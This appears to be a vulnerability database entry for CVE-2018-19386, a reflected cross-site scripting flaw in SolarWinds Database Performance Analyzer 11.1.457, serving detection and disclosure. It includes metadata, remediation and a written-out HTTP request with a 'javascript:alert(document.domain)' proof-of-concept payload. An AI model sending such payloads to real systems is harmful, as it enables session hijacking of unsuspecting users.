| Title | SolarWinds Database Performance Analyzer 11.1.457 - Cross-Site Scripting |
|---|---|
| Author | pikpikcu |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking or defacement of the affected application. |
| Remediation | Apply the latest patch or upgrade to a non-vulnerable version of SolarWinds Database Performance Analyzer. |
| CVSS Score | 6.1 |
| EPSS Score | 0.23271 |
| CVE ID | CVE-2018-19386 |
| CWE ID | CWE-79 |
| Tags | cve cve2018 solarwinds xss vuln |
SolarWinds Database Performance Analyzer 11.1.457 contains a reflected cross-site scripting vulnerability in its idcStateError component, where the page parameter is reflected into the HREF of the ‘Try Again’ Button on the page, aka a /iwc/idcStateError.iwc?page= URI.
GET /iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-19386.yaml
🦈 Packet Capture: ⬇️ Download cve-2018-19386.pcap
N/AN/A